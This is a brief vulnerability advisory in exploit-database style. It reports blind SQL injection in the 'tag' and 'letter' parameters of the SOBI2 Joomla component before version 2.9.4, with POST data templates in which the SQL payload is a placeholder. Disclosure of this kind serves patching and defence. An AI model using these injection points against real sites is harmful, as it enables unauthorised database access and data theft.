# Exploit Title: SOBI2 Joomla! Component Blind SQL Injections
# Date: 13 July 2011
# Author: jdc
# Version:
# Fixed In: 2.9.4

Versions prior to 2.9.4 suffer from a blind sql injection in both the "tag" and "letter" parameters. The request MUST reach the site with these parameters urlencoded for the injection to succeed.  

POSTDATA: option=com_sobi2&tmpl=component&tag=[Encoded SQL]
POSTDATA: option=com_sobi2&tmpl=component&letter=[Encoded SQL]